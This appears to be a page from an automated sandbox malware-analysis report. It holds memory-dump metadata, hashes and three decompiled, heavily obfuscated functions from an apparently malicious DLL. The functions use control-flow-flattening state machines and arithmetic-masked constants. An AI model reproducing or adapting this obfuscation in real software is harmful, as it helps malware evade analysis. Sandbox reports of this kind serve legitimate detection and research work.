0x10004c0d
0x10004c1d
0x10004c31
0x10004c31
0x10004c3f
0x00000000
0x10004d82
0x10004c47
0x10004cc5
0x10004cca
0x10004cce
0x10004cdd
0x10004d2b
0x10004d40
0x10004d45
0x10004d48
0x00000000
0x10004d48
0x10004c49
0x10004c4b
0x00000000
0x00000000
0x10004c51
0x10004c56
0x10004c5a
0x10004c9e
0x10004cb6
0x10004cbb
0x10004cbe
0x10004cbe
0x10004d4f
0x10004d51
0x10004d51
0x10004d51
0x00000000

Strings

la, xrefs: 10004AA2
r, xrefs: 10004B97
', xrefs: 10004B3F
}K, xrefs: 10004BF0
cD, xrefs: 10004A3C
E,, xrefs: 10004956
Kc, xrefs: 10004BE8

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: E,$Kc$cD$la$}K$'$r
API String ID: 0-4173883944
Opcode ID: f6f2ac4513d94ff31b18503c2e7f1063d6e9ce9d88ac65dc7b9285b1476eb03b
Instruction ID: a495d75ccf5a2f177f72da7b58064f056bd45d32e8eb6c9b680d2af574304199
Opcode Fuzzy Hash: f6f2ac4513d94ff31b18503c2e7f1063d6e9ce9d88ac65dc7b9285b1476eb03b
Instruction Fuzzy Hash: 90D10F714097819FE368CF21C98994BFBF1FBC4748F108A1DF1AA962A0D7B59909CF46

Uniqueness

Uniqueness Score: -1.00%

Function 100193AA Relevance: 9.0, Strings: 7, Instructions: 242
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E100193AA(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a32) {
				intOrPtr _v60;
				char _v68;
				char _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				char _t248;
				void* _t268;
				signed int _t277;
				signed int _t278;
				signed int _t279;
				signed int _t280;
				void* _t283;
				void* _t306;
				intOrPtr _t307;
				signed int* _t310;

				_push(_a32);
				_t306 = __edx;
				_push(0);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(__edx);
				_push(__ecx);
				_t248 = E10012550(0);
				_v72 = _t248;
				_t307 = _t248;
				_v148 = 0x29e1;
				_t310 =  &(( &_v176)[0xa]);
				_v148 = _v148 >> 9;
				_t283 = 0x2cc51d90;
				_v148 = _v148 * 0x6f;
				_v148 = _v148 | 0x583ef178;
				_v148 = _v148 ^ 0x583efdfc;
				_v164 = 0x7cea;
				_v164 = _v164 | 0x4429ef4c;
				_v164 = _v164 + 0xf89e;
				_v164 = _v164 + 0xffff234a;
				_v164 = _v164 ^ 0x442a1bf6;
				_v92 = 0x551c;
				_v92 = _v92 | 0xd302566e;
				_v92 = _v92 ^ 0xd3022a7a;
				_v144 = 0x6ba7;
				_v144 = _v144 << 4;
				_v144 = _v144 + 0xffffb9a2;
				_v144 = _v144 + 0x5888;
				_v144 = _v144 ^ 0x0006e6af;
				_v112 = 0x922a;
				_v112 = _v112 + 0xffff887d;
				_v112 = _v112 | 0x4fd748bd;
				_v112 = _v112 ^ 0x4fd73150;
				_v96 = 0xfb64;
				_v96 = _v96 ^ 0x5db48c82;
				_v96 = _v96 ^ 0x5db438bb;
				_v80 = 0xb20f;
				_v80 = _v80 >> 2;
				_v80 = _v80 ^ 0x0000552e;
				_v172 = 0x50a7;
				_v172 = _v172 + 0xf2d5;
				_v172 = _v172 + 0x271f;
				_v172 = _v172 << 2;
				_v172 = _v172 ^ 0x0005de3e;
				_v100 = 0xadaf;
				_v100 = _v100 * 0x16;
				_v100 = _v100 ^ 0x000ed173;
				_v116 = 0xf129;
				_v116 = _v116 << 0x10;
				_v116 = _v116 * 0x16;
				_v116 = _v116 ^ 0xb986550c;
				_v104 = 0x5183;
				_v104 = _v104 << 0x10;
				_v104 = _v104 + 0xffff5d8d;
				_v104 = _v104 ^ 0x51824a7c;
				_v88 = 0x760e;
				_v88 = _v88 + 0x327e;
				_v88 = _v88 ^ 0x000099bb;
				_v108 = 0xe303;
				_v108 = _v108 | 0x0bc04f3b;
				_v108 = _v108 ^ 0xb2f83cb4;
				_v108 = _v108 ^ 0xb938c20e;
				_v168 = 0xcb46;
				_v168 = _v168 | 0x1c191218;
				_v168 = _v168 ^ 0xd77ae4dd;
				_v168 = _v168 * 3;
				_v168 = _v168 ^ 0x6229d687;
				_v128 = 0x9759;
				_v128 = _v128 + 0x8621;
				_t277 = 0xf;
				_v128 = _v128 / _t277;
				_v128 = _v128 ^ 0x00007121;
				_v76 = 0xd82;
				_t278 = 0x2a;
				_v76 = _v76 * 0xe;
				_v76 = _v76 ^ 0x0000cd5d;
				_v132 = 0x21c9;
				_v132 = _v132 * 0x5a;
				_v132 = _v132 ^ 0x66c8732e;
				_v132 = _v132 ^ 0x66c3ddac;
				_v176 = 0x796f;
				_v176 = _v176 << 9;
				_v176 = _v176 + 0x7729;
				_v176 = _v176 ^ 0xc241325b;
				_v176 = _v176 ^ 0xc2b2798d;
				_v140 = 0xd764;
				_v140 = _v140 >> 0xa;
				_v140 = _v140 | 0x53b98b23;
				_v140 = _v140 ^ 0x53b9a9a1;
				_v156 = 0xc431;
				_v156 = _v156 * 0x4f;
				_v156 = _v156 / _t278;
				_t279 = 0x11;
				_v156 = _v156 * 0x67;
				_v156 = _v156 ^ 0x00942fb3;
				_v124 = 0x3cc2;
				_v124 = _v124 * 9;
				_v124 = _v124 ^ 0x606055d7;
				_v124 = _v124 ^ 0x60627716;
				_v120 = 0xfe38;
				_v120 = _v120 ^ 0x435657c1;
				_v120 = _v120 + 0x12e6;
				_v120 = _v120 ^ 0x4356a6ba;
				_v152 = 0x32f6;
				_v152 = _v152 | 0x1093d085;
				_v152 = _v152 / _t279;
				_v152 = _v152 << 4;
				_v152 = _v152 ^ 0x0f9a6d0a;
				_v160 = 0x4b19;
				_t280 = 0x77;
				_v160 = _v160 / _t280;
				_v160 = _v160 ^ 0xf7099762;
				_v160 = _v160 | 0x01d0dbaa;
				_v160 = _v160 ^ 0xf7d9b5b4;
				_v84 = 0x47d5;
				_v84 = _v84 << 5;
				_v84 = _v84 ^ 0x0008a7be;
				_v136 = 0xe6c7;
				_v136 = _v136 >> 3;
				_v136 = _v136 | 0xf3ae5db4;
				_v136 = _v136 ^ 0xf3ae7fe8;
				do {
					while(_t283 != 0x1257245d) {
						if(_t283 == 0x1752ae50) {
							_push(_t283);
							_t268 = E1001BB38(_a8, _v92, _v144, _v112, _v96,  &_v72);
							_t310 =  &(_t310[5]);
							__eflags = _t268;
							if(_t268 != 0) {
								_t283 = 0x2f6ec6e3;
								continue;
							}
						} else {
							if(_t283 == 0x2cc51d90) {
								_t283 = 0x1752ae50;
								continue;
							} else {
								_t317 = _t283 - 0x2f6ec6e3;
								if(_t283 != 0x2f6ec6e3) {
									goto L10;
								} else {
									E10005755(_v80,  &_v68, _v172, _v100, 0x44);
									_v68 = 0x44;
									_v60 = E10005DFC(_v116, _v104, _t317);
									_t307 = E10010566(_a32, _t306, _a8, _v168, _v128, 0, _v76, _v72, _v132, _v176, _v164 | _v148, _v140, _v156,  &_v68, _v124, _v88, _v108, 0x100013b0);
									E10010D6D(_v120, _v152, _v160, _v60);
									_t310 =  &(_t310[5]) - 0xc + 0x4c;
									_t283 = 0x1257245d;
									continue;
								}
							}
						}
						goto L11;
					}
					E1001506F(_v84, _v136, _v72);
					_t283 = 0x5a97d8c;
					L10:
					__eflags = _t283 - 0x5a97d8c;
				} while (_t283 != 0x5a97d8c);
				L11:
				return _t307;
			}

0x100193b4
0x100193bd
0x100193bf
0x100193c0
0x100193c7
0x100193ce
0x100193d5
0x100193dc
0x100193e3
0x100193e4
0x100193e5
0x100193e6
0x100193eb
0x100193f2
0x100193f4
0x100193fc
0x100193ff
0x10019404
0x1001940e
0x10019412
0x1001941a
0x10019422
0x1001942a
0x10019432
0x1001943a
0x10019442
0x1001944a
0x10019452
0x1001945a
0x10019462
0x1001946a
0x1001946f
0x10019477
0x1001947f
0x10019487
0x1001948f
0x10019497
0x1001949f
0x100194a7
0x100194af
0x100194b7
0x100194bf
0x100194c7
0x100194cc
0x100194d4
0x100194dc
0x100194e4
0x100194ec
0x100194f1
0x100194f9
0x10019506
0x1001950a
0x10019512
0x1001951a
0x10019524
0x10019528
0x10019530
0x10019538
0x1001953d
0x10019545
0x1001954d
0x10019555
0x1001955d
0x10019565
0x1001956d
0x10019575
0x1001957d
0x10019585
0x1001958d
0x10019595
0x100195a2
0x100195a6
0x100195ae
0x100195b8
0x100195cb
0x100195d0
0x100195d6
0x100195de
0x100195eb
0x100195ee
0x100195f2
0x100195fa
0x10019607
0x1001960b
0x10019613
0x1001961b
0x10019623
0x10019628
0x10019630
0x10019638
0x10019640
0x10019648
0x1001964d
0x10019655
0x1001965d
0x1001966a
0x10019676
0x1001967f
0x10019682
0x10019686
0x1001968e
0x1001969b
0x1001969f
0x100196a7
0x100196af
0x100196b7
0x100196bf
0x100196c7
0x100196cf
0x100196d7
0x100196e7
0x100196eb
0x100196f0
0x100196f8
0x10019704
0x1001970c
0x10019710
0x10019718
0x10019720
0x10019728
0x10019730
0x10019735
0x1001973d
0x10019745
0x1001974a
0x10019752
0x1001975a
0x1001975a
0x10019768
0x10019851
0x1001986e
0x10019873
0x10019876
0x10019878
0x1001987a
0x00000000
0x1001987a
0x1001976e
0x10019774
0x1001984a
0x00000000
0x1001977a
0x1001977a
0x1001977c
0x00000000
0x10019782
0x10019797
0x100197a5
0x100197c4
0x10019827
0x10019838
0x1001983d
0x10019840
0x00000000
0x10019840
0x1001977c
0x10019774
0x00000000
0x10019768
0x1001988d
0x10019893
0x10019898
0x10019898
0x10019898
0x100198a5
0x100198b0

Strings

L)D, xrefs: 1001942A
~2, xrefs: 10019555
.U, xrefs: 100194CC
!q, xrefs: 100195D6
)w, xrefs: 10019628
D, xrefs: 100197A5
), xrefs: 100193F4

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: !q$)w$.U$D$L)D$~2$)
API String ID: 0-595699237
Opcode ID: 61006896aa12374908dd687971b7df76a1653f6a00b14105cccd7ee176d2fde2
Instruction ID: d8c5745440228d15f8f3c220517527380f33c9d76b186f89dc48dec647c75321
Opcode Fuzzy Hash: 61006896aa12374908dd687971b7df76a1653f6a00b14105cccd7ee176d2fde2
Instruction Fuzzy Hash: F2C1EE715083809FE368CF65D48A61BFBE1BBC5788F10891DF19A962A0D7B58A49CF43

Uniqueness

Uniqueness Score: -1.00%

Function 10005F04 Relevance: 9.0, Strings: 7, Instructions: 237
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E10005F04() {
				char _v524;
				intOrPtr _v548;
				char _v564;
				void* _v576;
				intOrPtr _v580;
				signed int _v584;
				char _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _t227;
				void* _t230;
				signed int _t231;
				void* _t233;
				signed int _t238;
				void* _t239;
				signed int _t241;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t246;
				signed int _t261;
				void* _t265;
				void* _t267;
				signed int* _t272;

				_t272 =  &_v676;
				_v580 = 0x338be2;
				asm("stosd");
				_t239 = 0;
				_t241 = 0x39;
				asm("stosd");
				_t265 = 0x41161d4;
				asm("stosd");
				_v620 = 0xc71e;
				_v620 = _v620 * 0x1e;
				_v620 = _v620 >> 5;
				_v620 = _v620 ^ 0x0000ba2c;
				_v648 = 0x4ad;
				_v648 = _v648 / _t241;
				_v648 = _v648 >> 0xe;
				_v648 = _v648 >> 0xe;
				_v648 = _v648 ^ 0x00000001;
				_v660 = 0xb98c;
				_v660 = _v660 | 0xef7bff5f;
				_v660 = _v660 ^ 0xef7ba8e4;
				_v632 = 0x5e63;
				_v632 = _v632 | 0xe7359418;
				_v632 = _v632 + 0x2517;
				_v632 = _v632 ^ 0xe7367cd6;
				_v596 = 0x2929;
				_v596 = _v596 + 0x43ca;
				_v596 = _v596 ^ 0x000063d5;
				_v664 = 0x7cfb;
				_v664 = _v664 ^ 0xff809b0f;
				_v664 = _v664 + 0x2cd1;
				_v664 = _v664 + 0x7a24;
				_v664 = _v664 ^ 0xff81c2ff;
				_v592 = 0xae03;
				_t242 = 9;
				_v592 = _v592 / _t242;
				_v592 = _v592 ^ 0x0000766d;
				_v608 = 0x3b9d;
				_v608 = _v608 | 0x6b9c2f64;
				_v608 = _v608 ^ 0x6b9c4a2d;
				_v656 = 0xaf4c;
				_v656 = _v656 << 2;
				_v656 = _v656 + 0xc291;
				_v656 = _v656 + 0x928e;
				_v656 = _v656 ^ 0x0004749a;
				_v604 = 0xbdeb;
				_v604 = _v604 | 0xec45ef56;
				_v604 = _v604 ^ 0xec45acc1;
				_v644 = 0x8038;
				_v644 = _v644 ^ 0x1255fbe8;
				_t243 = 0x4b;
				_v644 = _v644 / _t243;
				_v644 = _v644 * 0x17;
				_v644 = _v644 ^ 0x059f4be8;
				_v652 = 0x8226;
				_v652 = _v652 << 1;
				_v652 = _v652 + 0xffffb0cc;
				_v652 = _v652 + 0xffff366a;
				_v652 = _v652 ^ 0xffff9d86;
				_v640 = 0x94c8;
				_v640 = _v640 >> 3;
				_v640 = _v640 | 0xd3d89bc1;
				_v640 = _v640 ^ 0xd3d8bf09;
				_v600 = 0x2497;
				_v600 = _v600 >> 5;
				_v600 = _v600 ^ 0x00002681;
				_v616 = 0xf8c0;
				_v616 = _v616 + 0xffffe75c;
				_v616 = _v616 >> 5;
				_v616 = _v616 ^ 0x00007175;
				_v624 = 0x8160;
				_t244 = 0x37;
				_v624 = _v624 / _t244;
				_v624 = _v624 + 0xffff3ee5;
				_v624 = _v624 ^ 0xffff1b58;
				_v636 = 0xef93;
				_v636 = _v636 | 0x0110f965;
				_t245 = 0x18;
				_v636 = _v636 * 0x45;
				_v636 = _v636 ^ 0x4994db44;
				_v612 = 0xb7f9;
				_v612 = _v612 | 0xd5831ca8;
				_v612 = _v612 ^ 0xd583ba2a;
				_v668 = 0xb9bd;
				_v668 = _v668 >> 0xb;
				_v668 = _v668 + 0xf462;
				_v668 = _v668 + 0xb834;
				_v668 = _v668 ^ 0x0001a073;
				_v676 = 0xaaae;
				_t264 = _v612;
				_v676 = _v676 / _t245;
				_t227 = _v676;
				_t246 = 0x6e;
				_t261 = _t227 % _t246;
				_v676 = _t227 / _t246;
				_v676 = _v676 + 0xffff2536;
				_v676 = _v676 ^ 0xffff3866;
				_v628 = 0x8f9e;
				_v628 = _v628 * 3;
				_v628 = _v628 >> 5;
				_v628 = _v628 ^ 0x00000ef3;
				_v672 = 0x182c;
				_v672 = _v672 + 0xffff84fe;
				_v672 = _v672 + 0xd7a3;
				_v672 = _v672 | 0x6c762e0a;
				_v672 = _v672 ^ 0x6c767ecc;
				do {
					while(_t265 != 0x5e31a3) {
						if(_t265 == 0x41161d4) {
							_t265 = 0xacc4a3c;
							continue;
						} else {
							if(_t265 == 0x7641b8a) {
								_t231 = E10017A31(_v644,  &_v564, _t246, _v652, _t264, _v640, _t246, _v600);
								asm("sbb esi, esi");
								_t261 = _v624;
								_t246 = _v616;
								_t265 = ( ~_t231 & 0x1bdf7361) + 0x8e8e3cb;
								E1000F1ED(_t246, _t261, _v636, _v612, _t264);
								_t272 =  &(_t272[9]);
								goto L19;
							} else {
								if(_t265 == 0xacc4a3c) {
									_push(_t246);
									_t261 =  &_v524;
									_t246 = _v660;
									_t233 = E1000DFD8(_t246, _t261, __eflags, _v632, _v596);
									_t272 =  &(_t272[3]);
									__eflags = _t233;
									if(__eflags != 0) {
										_t265 = 0x2aa4bbbd;
										continue;
									}
								} else {
									if(_t265 == 0x24c8572c) {
										_t261 = _v676;
										E10014291(_v668, _t261,  &_v588, _v628);
										_pop(_t246);
										_t265 = 0x5e31a3;
										continue;
									} else {
										if(_t265 != 0x2aa4bbbd) {
											goto L19;
										} else {
											_push(_t246);
											_t261 = _v620;
											_t246 = _v648;
											_t238 = E1001C0C8(_t246, _t261, _v664,  &_v524, _v592, _v608, 0, _v656, _t246, _v672, _v604);
											_t264 = _t238;
											_t272 =  &(_t272[0xa]);
											if(_t238 != 0xffffffff) {
												_t265 = 0x7641b8a;
												continue;
											}
										}
									}
								}
							}
						}
						goto L20;
					}
					_t230 = E100047EB();
					_t267 = _v588 - _v548;
					_t246 = _v584;
					asm("sbb ecx, [esp+0x94]");
					__eflags = _t246 - _t261;
					if(__eflags >= 0) {
						if(__eflags > 0) {
							L17:
							_t239 = 1;
							__eflags = 1;
						} else {
							__eflags = _t267 - _t230;
							if(_t267 >= _t230) {
								goto L17;
							}
						}
					}
					_t265 = 0x8e8e3cb;
					L19:
					__eflags = _t265 - 0x8e8e3cb;
				} while (__eflags != 0);
				L20:
				return _t239;
			}

0x10005f04
0x10005f0a
0x10005f1e
0x10005f1f
0x10005f23
0x10005f26
0x10005f27
0x10005f2c
0x10005f2d
0x10005f3a
0x10005f3e
0x10005f43
0x10005f4b
0x10005f5b
0x10005f5f
0x10005f64
0x10005f69
0x10005f6e
0x10005f76
0x10005f7e
0x10005f86
0x10005f8e
0x10005f96
0x10005f9e
0x10005fa6
0x10005fae
0x10005fb6
0x10005fbe
0x10005fc6
0x10005fce
0x10005fd6
0x10005fde
0x10005fe6
0x10005ff2
0x10005ff7
0x10005ffd
0x10006005
0x1000600d
0x10006015
0x1000601d
0x10006025
0x1000602a
0x10006032
0x1000603a
0x10006042
0x1000604a
0x10006052
0x1000605a
0x10006062
0x1000606e
0x10006071
0x1000607a
0x1000607e
0x10006086
0x1000608e
0x10006092
0x1000609a
0x100060a2
0x100060aa
0x100060b2
0x100060b7
0x100060bf
0x100060c7
0x100060d1
0x100060db
0x100060e3
0x100060eb
0x100060f3
0x100060f8
0x10006100
0x1000610e
0x10006113
0x10006119
0x10006121
0x10006129
0x10006131
0x1000613e
0x10006141
0x10006145
0x1000614d
0x10006155
0x1000615d
0x10006165
0x1000616d
0x10006172
0x1000617a
0x10006182
0x1000618a
0x1000619a
0x1000619e
0x100061a2
0x100061a6
0x100061a7
0x100061a9
0x100061ad
0x100061b5
0x100061bd
0x100061ca
0x100061ce
0x100061d3
0x100061db
0x100061e3
0x100061eb
0x100061f3
0x100061fb
0x10006203
0x10006203
0x10006215
0x1000632b
0x00000000
0x1000621b
0x10006221
0x100062fd
0x1000630b
0x10006311
0x1000631b
0x1000631f
0x10006321
0x10006326
0x00000000
0x10006227
0x1000622d
0x100062b5
0x100062ba
0x100062c5
0x100062c9
0x100062ce
0x100062d1
0x100062d3
0x100062d9
0x00000000
0x100062d9
0x10006233
0x10006239
0x10006297
0x100062a4
0x100062aa
0x100062ab
0x00000000
0x1000623b
0x10006241
0x00000000
0x10006247
0x10006247
0x1000626e
0x10006272
0x10006276
0x1000627b
0x1000627d
0x10006283
0x10006289
0x00000000
0x10006289
0x10006283
0x10006241
0x10006239
0x1000622d
0x10006221
0x00000000
0x10006215
0x10006335
0x1000633e
0x10006345
0x10006349
0x10006350
0x10006352
0x10006354
0x1000635a
0x1000635c
0x1000635c
0x10006356
0x10006356
0x10006358
0x00000000
0x00000000
0x10006358
0x10006354
0x1000635d
0x1000635f
0x1000635f
0x1000635f
0x1000636a
0x10006373

Strings

$z, xrefs: 10005FD6
.vl, xrefs: 100061F3
uq, xrefs: 100060F8
c^, xrefs: 10005F86
mv, xrefs: 10005FFD
VE, xrefs: 1000604A
)), xrefs: 10005FA6

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: .vl$$z$))$VE$c^$mv$uq
API String ID: 0-129554973
Opcode ID: ee9812c7270f18a38839004d5a8fb2575288c372572a24ef6638758e56e56959
Instruction ID: 022e6794ac08f313e43eba532d4516b8915dcd53da48e2b064275c5dd1d49094
Opcode Fuzzy Hash: ee9812c7270f18a38839004d5a8fb2575288c372572a24ef6638758e56e56959
Instruction Fuzzy Hash: 35B123729083419FE358CE25C88990FBBF2FBC5758F504A1CF599562A0D3B99A09CF47

Uniqueness

Uniqueness Score: -1.00%

Function 1001434E Relevance: 8.9, Strings: 7, Instructions: 199
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E1001434E() {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t172;
				signed int _t176;
				void* _t179;
				void* _t200;
				intOrPtr _t206;
				signed int _t207;
				signed int _t208;
				signed int _t209;
				signed int _t210;
				signed int _t211;
				signed int _t212;
				intOrPtr* _t214;
				signed int* _t216;

				_t216 =  &_v80;
				_v16 = 0x14d035;
				_v12 = 0x6b8268;
				_t179 = 0xb19f7ca;
				_t206 = 0;
				_v8 = 0;
				_v4 = 0;
				_v32 = 0x3622;
				_v32 = _v32 >> 3;
				_v32 = _v32 ^ 0x000106c4;
				_v40 = 0x4e9a;
				_v40 = _v40 >> 0xc;
				_v40 = _v40 ^ 0x000001e1;
				_v80 = 0xc10;
				_v80 = _v80 >> 9;
				_t207 = 0x7c;
				_v80 = _v80 / _t207;
				_v80 = _v80 >> 0xf;
				_v80 = _v80 ^ 0x0000249f;
				_v64 = 0x9f18;
				_v64 = _v64 >> 0xb;
				_v64 = _v64 + 0xffff1ff5;
				_v64 = _v64 | 0x0b80b4b6;
				_v64 = _v64 ^ 0xffff9b0d;
				_v36 = 0x945d;
				_v36 = _v36 + 0xffff610d;
				_v36 = _v36 ^ 0xffffd8f7;
				_v48 = 0x2aad;
				_t208 = 0x7f;
				_v48 = _v48 / _t208;
				_v48 = _v48 ^ 0x00003e6e;
				_v56 = 0xddc4;
				_t209 = 0x5e;
				_v56 = _v56 * 0x14;
				_v56 = _v56 + 0xffff71f7;
				_v56 = _v56 ^ 0x001091c0;
				_v68 = 0xa802;
				_v68 = _v68 ^ 0x67e8667b;
				_v68 = _v68 >> 0xc;
				_v68 = _v68 * 0x47;
				_v68 = _v68 ^ 0x01cd2f8d;
				_v52 = 0xc142;
				_v52 = _v52 * 0x44;
				_v52 = _v52 ^ 0x822744f1;
				_v52 = _v52 ^ 0x82146dfa;
				_v72 = 0xbd15;
				_v72 = _v72 / _t209;
				_v72 = _v72 ^ 0x12aa425e;
				_v72 = _v72 | 0x2ffcb14d;
				_v72 = _v72 ^ 0x3ffeb451;
				_v76 = 0x6e7b;
				_v76 = _v76 >> 0xb;
				_v76 = _v76 >> 3;
				_v76 = _v76 / _t209;
				_v76 = _v76 ^ 0x00006fef;
				_v20 = 0x31f;
				_v20 = _v20 | 0xb0d9e19e;
				_v20 = _v20 ^ 0xb0d9bf73;
				_v60 = 0x7aa7;
				_t178 = _v20;
				_t210 = 0x41;
				_v60 = _v60 / _t210;
				_t211 = 0x59;
				_t215 = _v20;
				_v60 = _v60 * 0x36;
				_t212 = _v20;
				_v60 = _v60 / _t211;
				_v60 = _v60 ^ 0x0000613c;
				_v24 = 0x73cc;
				_v24 = _v24 >> 0xc;
				_v24 = _v24 ^ 0x00003ffa;
				_v28 = 0xa6c1;
				_v28 = _v28 >> 3;
				_v28 = _v28 ^ 0x0000757c;
				_v44 = 0x6c53;
				_v44 = _v44 | 0xc78368a0;
				_v44 = _v44 ^ 0xc78c6ccc;
				while(1) {
					L1:
					_t200 = 0x5c;
					do {
						L2:
						while(_t179 != 0xa00144c) {
							if(_t179 == 0xb19f7ca) {
								_t179 = 0x2b2ed007;
								continue;
							} else {
								if(_t179 == 0xbc9e916) {
									E10005AB8(_v20, _v60, _v24, _v28, _t178);
								} else {
									if(_t179 == 0x118767b3) {
										E10005AB8(_v68, _v52, _v72, _v76, _t215);
										_t216 =  &(_t216[3]);
										_t179 = 0xbc9e916;
										while(1) {
											L1:
											_t200 = 0x5c;
											goto L2;
										}
									} else {
										if(_t179 == 0x2b2ed007) {
											_t214 =  *0x10021088 + 0x38;
											while( *_t214 != _t200) {
												_t214 = _t214 + 2;
											}
											_t212 = _t214 + 2;
											_t179 = 0x39878866;
											continue;
										} else {
											if(_t179 == 0x39878866) {
												_t176 = E1001340E(_v40, _v80, _t179, _t179, _v44);
												_t178 = _t176;
												_t216 =  &(_t216[3]);
												if(_t176 != 0) {
													_t179 = 0xa00144c;
													while(1) {
														L1:
														_t200 = 0x5c;
														goto L2;
													}
												}
											} else {
												if(_t179 != 0x3a731069) {
													goto L21;
												} else {
													E1000FF0D(_v48, _v56, _t215);
													_t206 =  !=  ? 1 : _t206;
													_t179 = 0x118767b3;
													while(1) {
														L1:
														_t200 = 0x5c;
														goto L2;
													}
												}
											}
										}
									}
								}
							}
							L24:
							return _t206;
						}
						_t172 = E10010321(_t178, _v32, _v64, _v36, _t212);
						_t215 = _t172;
						_t216 =  &(_t216[3]);
						if(_t172 == 0) {
							_t179 = 0xbc9e916;
							_t200 = 0x5c;
							goto L21;
						} else {
							_t179 = 0x3a731069;
							goto L1;
						}
						goto L24;
						L21:
					} while (_t179 != 0x1689c33b);
					goto L24;
				}
			}

0x1001434e
0x10014351
0x1001435b
0x10014363
0x1001436c
0x1001436e
0x10014372
0x10014376
0x1001437e
0x10014383
0x1001438b
0x10014393
0x10014398
0x100143a0
0x100143a8
0x100143b3
0x100143b8
0x100143bc
0x100143c1
0x100143c9
0x100143d1
0x100143d6
0x100143de
0x100143e6
0x100143ee
0x100143f6
0x100143fe
0x10014406
0x10014414
0x10014419
0x1001441d
0x10014425
0x10014434
0x10014435
0x10014439
0x10014441
0x10014449
0x10014451
0x10014459
0x10014463
0x10014467
0x1001446f
0x1001447c
0x10014480
0x10014488
0x10014490
0x100144a0
0x100144a4
0x100144ac
0x100144b4
0x100144bc
0x100144c4
0x100144c9
0x100144d4
0x100144d8
0x100144e0
0x100144e8
0x100144f0
0x100144f8
0x10014508
0x1001450c
0x10014511
0x1001451c
0x1001451d
0x10014521
0x1001452b
0x1001452f
0x10014533
0x1001453b
0x10014543
0x10014548
0x10014550
0x10014558
0x1001455d
0x10014565
0x1001456d
0x10014575
0x1001457d
0x1001457d
0x1001457f
0x10014580
0x00000000
0x10014580
0x10014592
0x10014657
0x00000000
0x10014598
0x1001459e
0x100146af
0x100145a4
0x100145aa
0x10014645
0x1001464a
0x1001464d
0x1001457d
0x1001457d
0x1001457f
0x00000000
0x1001457f
0x100145b0
0x100145b6
0x1001461a
0x10014622
0x1001461f
0x1001461f
0x10014627
0x1001462a
0x00000000
0x100145b8
0x100145be
0x100145f8
0x100145fd
0x100145ff
0x10014604
0x1001460a
0x1001457d
0x1001457d
0x1001457f
0x00000000
0x1001457f
0x1001457d
0x100145c0
0x100145c6
0x00000000
0x100145cc
0x100145d5
0x100145e0
0x100145e3
0x1001457d
0x1001457d
0x1001457f
0x00000000
0x1001457f
0x1001457d
0x100145c6
0x100145be
0x100145b6
0x100145aa
0x1001459e
0x100146b7
0x100146c0
0x100146c0
0x10014670
0x10014675
0x10014677
0x1001467c
0x1001468a
0x1001468f
0x00000000
0x1001467e
0x1001467e
0x00000000
0x1001467e
0x00000000
0x10014690
0x10014690
0x00000000
0x1001469c

Strings

Sl, xrefs: 10014565
|u, xrefs: 1001455D
n>, xrefs: 1001441D
{fg, xrefs: 10014451
<a, xrefs: 10014533
o, xrefs: 100144D8
"6, xrefs: 10014376

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

